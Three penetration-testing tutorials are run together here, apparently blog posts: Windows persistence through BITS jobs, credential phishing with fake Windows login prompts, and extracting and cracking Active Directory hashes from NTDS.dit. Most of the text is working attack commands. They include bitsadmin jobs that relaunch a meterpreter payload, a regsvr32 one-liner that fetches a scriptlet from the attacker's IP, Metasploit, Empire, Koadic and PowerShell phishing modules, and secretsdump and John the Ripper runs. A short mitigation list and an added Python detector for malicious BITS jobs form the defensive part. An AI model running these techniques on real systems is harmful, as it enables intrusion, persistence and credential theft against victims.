Windows Persistence using Bits Job


In this article, we describe how a BITS job can be used to provide persistent access to the target machine.

Table of Content
·         Introduction
·         Configurations used in Practical
·         Manual Persistence
·         Metasploit Persistence
·         Metasploit (file-less) Persistence
·         Mitigation

Introduction
Background Intelligent Transfer Service Admin (BITSAdmin) is a command-line tool that creates download or upload jobs and monitors their progress. BITSAdmin was released with Windows XP, where it used IBackgroundCopyJob as its interface. The upload option of BITSAdmin was introduced with Windows Server 2003. Windows Vista added features such as custom HTTP headers, certificate-based client authentication and IPv6 support. Windows Server 2008, released the following year, introduced the file transfer notification method, and Windows 7 introduced BranchCache for BITS transfers. When BITS downloads a file, the actual download is performed by the BITS service hosted in svchost.exe. BITSAdmin is used to download files from, or upload files to, HTTP web servers and SMB file shares. It takes the cost of the transfer and the network usage into account so that the user's foreground work is not affected. BITS can handle network interruptions, pausing and automatically resuming transfers, even after a reboot.
Read more about BITS jobs in our dedicated article here.

Configurations used in Practical
Attacker:
    OS: Kali Linux 2020.1
    IP: 192.168.1.112
Target:
    OS: Windows 10
    IP: 192.168.1.102

Manual Persistence
Let's talk about manual persistence. In this scenario, we assume physical access to the target system as well as a meterpreter session on it. After gaining the meterpreter session, upload a payload to the target system; this payload will give us the persistent session.
upload /root/raj.exe C:\



Now we have the payload named "raj.exe". We will configure a BITS job to execute it at regular intervals. Since we have physical access to the system in this scenario, we will use a command prompt for the following steps.
First, we create a job named payload; the name can be anything we want. We will run all of these commands using BITSAdmin, the tool that manages BITS jobs.
bitsadmin /create payload
BITS jobs were created to transfer, and mostly to download, files from Microsoft servers or any other server. A job needs at least one file added to its configuration before it can proceed. The URL we provide here is bogus; it can be anything, as it plays no role except fulfilling BITSAdmin's configuration requirements.
bitsadmin /addfile payload "https://www.hackingarticles.in/raj.exe"  "C:\raj.exe"
A BITS job can run a command line when its transfer completes or errors out. This was meant so that a prompt can be shown when an update has been downloaded, or some other task can be performed alongside the download. We will use this command to execute the payload that we uploaded earlier through meterpreter.
bitsadmin /SetNotifyCmdLine payload C:\raj.exe NUL
When a BITS download fails, it can retry after a specific delay, which is set with the SetMinRetryDelay option. We use this option to run our payload again and again, so that if we lose the session, the next execution gives it back to us. We set it to 40 seconds here. Now all we need is to start the job, which is done with the resume option.
bitsadmin /SetMinRetryDelay "payload" 40
bitsadmin /resume payload



Back on our Kali attacker machine, we start a multi/handler listener to catch the session generated by the BITS job, using the same configuration we used to create the raj.exe payload. In a moment, another meterpreter session spawns. If the configuration is correct, we will get a new session every 40 seconds.



Metasploit Persistence
The next scenario is not too different from the previous one. All that changed is that we have lost physical access to the system, so we need to create the BITS job remotely. The methods and commands remain the same, except that after uploading the payload we run the shell command in meterpreter. All the commands we ran earlier to create the persistence are then run from there.

upload /root/raj.exe C:\
shell
bitsadmin /create payload
bitsadmin /addfile payload "https://www.hackingarticles.in/raj.exe"  "C:\raj.exe"
bitsadmin /SetNotifyCmdLine payload C:\raj.exe NUL
bitsadmin /SetMinRetryDelay "payload" 40
bitsadmin /resume payload




We start the multi/handler listener in another terminal so that it can catch the session generated by the BITS job we just configured. Soon enough we have a new session.



We performed this method to show that this kind of attack can be carried out remotely, without any physical access to the system.

Metasploit (file-less) Persistence
In the previous methods, we created a payload and sent it to the target machine. That payload leaves evidence of malicious activity on disk: it can be found by the user or by anti-virus software. So we thought of creating persistence without sending any file.
Note: This method can still be detected from the BITS logs.
We will use a malicious one-liner that is executed through regsvr32. First, we need to create the one-liner, using the multi/script/web_delivery module. We set the module's options, such as the IP address and port of the attacker machine where we will receive the session, and copy the generated script to our clipboard.

use exploit/multi/script/web_delivery
set target 3
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.112
set lport 1234
exploit
regsvr32.exe /s /n /u /i:http://192.168.1.112:8080/V1hTIQYe6Azh.sct scrobj.dll



Now we need a meterpreter session on the target system, as in the previous methods, and we run the shell command in meterpreter. We create a job, again named payload (it can be anything we want), and add the same bogus link as before. Now it's time to configure the command: here we configure the BITS job to run the malicious one-liner we copied earlier. Then we set the delay and we are good to go.
shell
bitsadmin /create payload
bitsadmin /addfile payload "https://www.hackingarticles.in/raj.exe"  "C:\raj.exe"
bitsadmin /SetNotifyCmdLine payload regsvr32.exe "/s /n /u /i:http://192.168.1.112:8080/V1hTIQYe6Azh.sct scrobj.dll"
bitsadmin /SetMinRetryDelay "payload" 40
bitsadmin /resume payload



Back on the attacker machine, the web_delivery module has already started its own listener. After some time we receive the session, which is configured to be persistent.



This concludes the demonstration of BITS jobs providing persistent shells on Windows machines. Now let's take a look at some useful mitigations against these kinds of attacks.

Mitigation
Our recommendations for mitigating BITS Jobs are:
·         Modify network and/or host firewall rules, as well as other network controls, to only allow legitimate BITS traffic.
·         Reduce the default BITS job lifetime in Group Policy or by editing the “JobInactivityTimeout” and “MaxDownloadTime” Registry values in HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS. The default maximum lifetime for a BITS job is 90 days, but that can be modified.
·         Limit the access of the BITSAdmin interface to specific users or groups.
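As an added example (not part of the article), here is a small Python review script for the output of bitsadmin /list /allusers /verbose that flags the traits of the jobs configured above: a notification command line, a retry delay shorter than the 600 second default, and a download that lands on disk as an executable. The listing it runs on is constructed and the verbose field names are approximations; the job names and the detection rules are assumptions made for this example.

```python
import re

# Review helper for "bitsadmin /list /allusers /verbose" output: flags jobs that carry a
# notification command line, retry unusually often, or drop executables on disk.
LOLBINS = ("regsvr32", "rundll32", "mshta", "powershell", "wscript", "cscript",
           "cmd.exe", "certutil", "scrobj.dll")
EXEC_EXT = (".exe", ".dll", ".sct", ".ps1", ".bat", ".vbs", ".hta")
DEFAULT_RETRY_DELAY = 600  # BITS default minimum retry delay, in seconds

def parse_jobs(listing):
    """Split a verbose listing into jobs and pull out the fields the review needs."""
    jobs = []
    for block in re.split(r"(?m)^(?=GUID:)", listing):
        if not block.startswith("GUID:"):
            continue
        def field(pattern, default=""):
            m = re.search(pattern, block, re.M)
            return m.group(1).strip() if m else default
        cmd = field(r"NOTIFICATION COMMAND LINE:\s*(.*)$")
        jobs.append({
            "name": field(r"DISPLAY:\s*(.*)$"),
            "state": field(r"STATE:\s*(\S+)"),
            "retry_delay": int(field(r"RETRY DELAY:\s*(\d+)", "0")),
            "notify_cmd": "" if cmd.lower() in ("", "none") else cmd,
            "files": re.findall(r"(?m)^\s+\d+\s*/\s*\S+\s+\S+\s+(\S+)\s+->\s+(.*)$", block),
        })
    return jobs

def review_job(job):
    """Return the reasons a job looks like a persistence job; an empty list means nothing notable."""
    reasons = []
    cmd = job["notify_cmd"].lower()
    if cmd:
        reasons.append("notification command line set: " + job["notify_cmd"])
        if any(b in cmd for b in LOLBINS) or "http" in cmd:
            reasons.append("command line runs a script host/LOLBin or references a URL")
        if 0 < job["retry_delay"] < DEFAULT_RETRY_DELAY:
            reasons.append("retry delay %ds is below the %ds default, so the command re-fires often"
                           % (job["retry_delay"], DEFAULT_RETRY_DELAY))
    for _src, dest in job["files"]:
        if dest.lower().endswith(EXEC_EXT):
            reasons.append("downloads an executable to " + dest)
    return reasons

def review_listing(listing):
    """Map each job's display name to its list of findings."""
    return {job["name"]: review_job(job) for job in parse_jobs(listing)}

# Constructed sample laid out after the verbose listing format (field names approximate).
SAMPLE_LISTING = r"""
GUID: {11111111-2222-3333-4444-555555555555} DISPLAY: UpdateJob (constructed, benign)
TYPE: DOWNLOAD STATE: TRANSFERRED OWNER: NT AUTHORITY\SYSTEM
RETRY DELAY: 600 NO PROGRESS TIMEOUT: 1209600 ERROR COUNT: 0
JOB FILES:
    4096 / 4096 WORKING https://updates.example.invalid/update.cab -> C:\ProgramData\update.cab
NOTIFICATION COMMAND LINE: none
GUID: {66666666-7777-8888-9999-000000000000} DISPLAY: payload
TYPE: DOWNLOAD STATE: TRANSIENT_ERROR OWNER: DESKTOP-1\raj
RETRY DELAY: 40 NO PROGRESS TIMEOUT: 1209600 ERROR COUNT: 12
JOB FILES:
    0 / UNKNOWN WORKING https://www.hackingarticles.in/raj.exe -> C:\raj.exe
NOTIFICATION COMMAND LINE: C:\raj.exe NUL
GUID: {AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE} DISPLAY: payload-fileless
TYPE: DOWNLOAD STATE: TRANSIENT_ERROR OWNER: DESKTOP-1\raj
RETRY DELAY: 40 NO PROGRESS TIMEOUT: 1209600 ERROR COUNT: 12
JOB FILES:
    0 / UNKNOWN WORKING https://www.hackingarticles.in/raj.exe -> C:\raj.exe
NOTIFICATION COMMAND LINE: regsvr32.exe /s /n /u /i:http://192.168.1.112:8080/V1hTIQYe6Azh.sct scrobj.dll
"""
```

Run review_listing on a saved listing from each host; any job with findings deserves a look at its owner, its files and the BITS-Client operational log.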
We at Hacking Articles request everyone to stay at home and self-quarantine to prevent the spread of COVID-19. I am writing this article while working from home. Take care and stay healthy!

Credential Dumping: Phishing


This is the ninth article in our series on credential dumping. In this article, we trigger various scenarios in which Windows asks for user authentication, and use them to retrieve the credentials. For security purposes, Windows requires users to validate their credentials for various operations, such as Outlook, User Account Control, or signing in from the lock screen. We can use this feature to our advantage to dump credentials after establishing a foothold on the target system. To exploit it, we use phishing techniques to harvest the credentials.
Table of content:
·         Metasploit Framework
o   Phish_windows_credentials
o   FakeLogonScreen
o   SharpLocker
·         PowerShell Empire
o   Collection/prompt
o   Collection/toasted
·         Koadic
o   Password_box
·         PowerShell
o   Invoke-CredentialsPhish.ps1
o   Invoke-LoginPrompt.ps1
·         Lockphish
·         Conclusion

Metasploit Framework: phish_windows_credentials
Metasploit comes with a built-in post-exploitation module that does the job. As it is a post module, it needs to be linked to an existing session. To use it, simply type:
use post/windows/gather/phish_windows_credentials
set session 1
exploit
This module waits for the user to start a new process. Once a process is started, a fake Windows Security dialogue box opens asking for the user's credentials, as shown in the image below:
As the user enters their credentials, they are captured and displayed as shown in the image below:
Metasploit Framework: FakeLogonScreen
FakeLogonScreen was created by Arris Huijgen. It is a Windows utility developed in C#, which allows various frameworks to inject it into memory; we will therefore execute it remotely using Metasploit.
We simply upload the utility from our meterpreter session and then execute it remotely with the following set of commands:
upload /root/FakeLogonScreen.exe
shell
FakeLogonScreen.exe


Upon execution, it simulates the Windows lock screen to obtain the password from the user. To do so, the tool renders the lock screen exactly as it is configured so that the user isn't suspicious, as shown in the image below:

It validates the credentials locally or against Active Directory as the user enters them, and then displays them on the console as shown in the image below:
Metasploit Framework: SharpLocker
This tool is very similar to the previous one. It was developed by Matt Pickford. Just like FakeLogonScreen, this tool too displays a fake lock screen for the user to enter credentials, and then dumps them keystroke by keystroke to the attacker.
We first upload the tool from our machine to the target system and then execute it. So, once you have the meterpreter session, just type:
upload /root/Downloads/SharpLocker.exe
shell
Then navigate to the Downloads folder and run the executable.
Upon execution, the tool triggers the lock screen on the target system as shown in the image below:


As the user enters the password, it captures the keystrokes until the whole password is revealed, as shown in the image below:
PowerShell Empire: collection/prompt
This Empire module prompts a dialogue box on the target system asking for credentials. We can use it with the following commands:
usemodule collection/prompt
execute
Once the user types the credentials into the dialogue box, the module displays them on the terminal as shown in the image below:



PowerShell Empire: collection/toasted
This Empire module displays a restart prompt on the target system. To use it, type the following commands:
usemodule collection/toasted
execute


Once the module executes, it shows the following dialogue box:
Once the restart is postponed, it asks for credentials to validate the decision, as shown in the image below:
As the user enters the credentials, they are shown on the terminal as shown in the image below:

Koadic: password_box
A similar module is found in Koadic. Once you have a session from it, use the following module to trigger the dialogue box:
use password_box
execute

When the user enters the username and password in the dialogue box, the password is displayed in the terminal too, as shown in the image below:
PowerShell: Invoke-CredentialsPhish.ps1
There is a PowerShell script that creates a fake prompt for the user to enter credentials. To run the script, type:
Import-Module C:\Users\raj\Desktop\Invoke-CredentialsPhish.ps1
Invoke-CredentialsPhish
Running the above commands pops up a prompt asking for credentials, as shown in the image below:
Once the user enters the credentials, they are displayed on the screen as shown in the image below:
PowerShell: Invoke-LoginPrompt.ps1
Similarly, there is another script, developed by Matt Nelson. This script again opens a dialogue box for the user to enter the password. To run the script, type the following:
Import-Module C:\Users\raj\Desktop\Invoke-LoginPrompt.ps1
Invoke-LoginPrompt

As you can see, the dialogue box appears on the screen; once the user enters the credentials, they are displayed back on the terminal.
Lockphish
Lockphish is another tool that lets us phish for credentials; you can download it from here. The tool creates a template that is hosted on a PHP server, and by default redirects the user to YouTube after the credentials are retrieved.
Start the tool with the following command:
./lockphish.sh

It generates a link as shown in the image above; send that link to the target. The target then opens the link and saves the file. Strong social engineering skills are required for this step.

The lock screen is then triggered and the user is forced to enter credentials, as shown in the image below:

After the user has entered the credentials, it redirects to YouTube as shown below:


And we have our credentials, as shown in the image below:


Conclusion
These were various methods we can use to dump the credentials of a target system. The appropriate method should be chosen depending on the scenario. The PowerShell methods are best for validating the credentials, as the prompt doesn't close until the correct credentials are entered. The Lockphish method doesn't recreate the lock screen as accurately as the other tools, and it also does not validate the credentials. Each method and tool has its advantages and disadvantages, but all of them are fairly good and work.

Credential Dumping: NTDS.dit


In this article, you will learn how passwords are stored in Windows Active Directory, find out how passwords are hashed in NTDS.dit, and then learn how to dump these credential hashes from the NTDS.dit file.

Table of Content
·         Introduction to NTDS
o   NTDS Partitions
o   Database Storage Table
·         Extracting Credentials from NTDS.dit using Multiple Methods
o   FGDump
o   NTDSUtil
o   DSInternals
o   NTDSDumpEx
o   Metasploit
§  NTDS_location
§  NTDS_grabber
§  secretsdump
o   Cracking Hashes

Introduction to NTDS
NTDS stands for New Technologies Directory Services and DIT stands for Directory Information Tree. The default location of the Active Directory database file is "C:\Windows\NTDS". This file acts as the database for Active Directory and stores all of its data, including all the credentials. The default Ntds.dit size from Server 2003 onwards is 12 MB, and it can grow up to 16 TB.
The Active Directory database is stored in a single NTDS.dit file, which is logically separated into the following partitions:




If you look at the information in NTDS, you will find that the data can also be divided into schema, configuration and domain information. Schema information holds all the details about objects and attributes; configuration information contains the data about forests and trees, which is replicated to all the domain controllers; and domain information holds all the detailed data related to the domain.
The data store stores directory information in a single database file called Ntds.dit. In addition, it
Data Store Physical Structure Components



The tables hold different information: the schema table holds all the objects in Active Directory and their relationships with each other, the link table holds all the attributes that refer to objects, and the data table contains all the data related to users, groups, etc.
Now that we have an idea about NTDS, it is time to extract some of those precious hashes from the server. We have a Windows Server with Active Directory set up in our lab environment for the following practical.

Local: FGDump
FGDump is a tool that was created for mass password auditing of Windows systems. This means that an attacker can also use FGDump to extract the passwords from a target machine. For this practical, we need to download FGDump from this link.
We open the Windows command prompt and move to the path where we downloaded FGDump; in this case, it is the Downloads directory. As FGDump is an executable, we run it directly from the command prompt.
fgdump.exe
As no parameters were provided, FGDump by default performed a local dump. After auditing the local passwords, FGDump reported that the password and cache dumps succeeded. Now let's take a look at the dumped data.



FGDump writes the hashes to a file with the extension .pwdump, named after the server. We can read the file using the type command. As shown in the image below, FGDump has successfully dumped the hashes from the target system.
type



Local: NTDSUtil
Enough with the Windows command prompt; it's time to move on to PowerShell. We are going to use another executable, NTDSutil.exe. We launch PowerShell and run NTDSutil.exe with a set of parameters that instruct it to create a directory called temp on the C:\ drive and use its ability to tap into the Active Directory database to fetch the SYSTEM and SECURITY hive files as well as the ntds.dit file. After working for a while, we have the hive files in the temp directory.
powershell "NTDSutil.exe 'ac i NTDS' 'ifm' 'create full c:\temp' q q"



We transfer the files to our Kali Linux machine to extract hashes from them, using the secretsdump.py script from the Impacket toolkit. All we need to provide is the path of the SYSTEM hive and the NTDS.dit file. Within seconds, secretsdump extracts the hashes for us.
secretsdump.py -ntds /root/NTDS.dit -system /root/SYSTEM LOCAL



Local: DSInternals
DSInternals is a framework designed by Michael Grafnetter for performing AD security audits. It is published in the official PowerShell Gallery, so we can download it using the Save-Module cmdlet. After downloading, we need to install the module before using it, which can be done using the Install-Module cmdlet and requires a change to the execution policy. After installing the module, we are good to go.
We first use the Get-BootKey cmdlet to extract the boot key from the SYSTEM hive. We then pass it to the Get-ADDBAccount cmdlet to read the data of one or more accounts from the NTDS.dit file, including secret attributes such as hashes.
Save-Module DSInternals -Path C:\Windows\System32\WindowsPowershell\v1.0\Modules
Set-ExecutionPolicy Unrestricted
Import-Module DSInternals
$key = Get-BootKey -SystemHivePath 'C:\SYSTEM'
Get-ADDBAccount -All -DBPath 'C:\NTDS.dit' -BootKey $key



The Get-ADDBAccount cmdlet produces a long sequence of output. Here we show the data of one of the users of the target machine. We can see that we have successfully extracted the NTLM hashes from the NTDS.dit file.



Local: NTDSDumpEx
Now it's time to use some external tools to attack the NTDS file. We will use NTDSDumpEx for this practical; you can download it from here. We unzip the downloaded archive and then use the executable to attack the NTDS file. We need to provide the path of the ntds.dit file and the SYSTEM hive. In no time, NTDSDumpEx gives us a list of the users with their respective hashes.
NTDSDumpEx.exe -d C:\NTDS.dit -s C:\SYSTEM




Remote: Metasploit (NTDS_location)
For all the Metasploit fans, there is no need to be disappointed: Metasploit works just fine for extracting hashes from the NTDS.dit file. We have two post modules that work side by side to target NTDS. The first one locates the ntds file. We need a session on the target system to move forward. After we gain a session, we select the ntds_location module and point it at the session. Upon running it, we get the location of the NTDS.dit file.
use post/windows/gather/ntds_location
set session 1
exploit



Remote: Metasploit (NTDS_grabber)
Moving on, we use another post module that extracts the NTDS.dit file and the SAM and SYSTEM hives from the target system. The catch is that it transfers these files as a .cab compressed archive.
use post/windows/gather/ntds_grabber
set session 1
exploit



The module works and transfers the cab file to the location shown in the image. To extract NTDS.dit and the hive files, we use a tool called cabextract, which extracts all three files.
cabextract
Now that we have NTDS.dit and the hive files at our disposal, we can use Impacket's secretsdump script to extract the hashes, as we did earlier.



Remote: Metasploit (secretsdump)
Suppose a scenario where we procured the server's login credentials by some method but cannot access the server directly. In that case, we can use this auxiliary module in the Metasploit framework to extract the hashes from the NTDS.dit file remotely. We need to provide the IP address of the target machine, a username and a password; the module grabs the hashes and displays them on our screen within seconds.
use auxiliary/scanner/smb/impacket/secretsdump
set rhosts 192.168.1.108
set smbuser administrator
set smbpass Ignite@987
exploit


Remote: Cracking Hash
To make sure that the hashes we extracted can be cracked, we take one and crack it with John the Ripper. We need to specify the hash format, which is NT. John the Ripper cracks the password in a matter of seconds.
cat hash
john --format=NT hash
john --format=NT hash --show



This concludes the various methods by which the hashes stored on a Windows Server can be extracted. We included multiple tools to cover the various scenarios an attacker may face. The only way to protect yourself against such attacks is to minimise the number of users who can access domain controllers, to continuously log and monitor their activity for any changes, and to recertify that access frequently.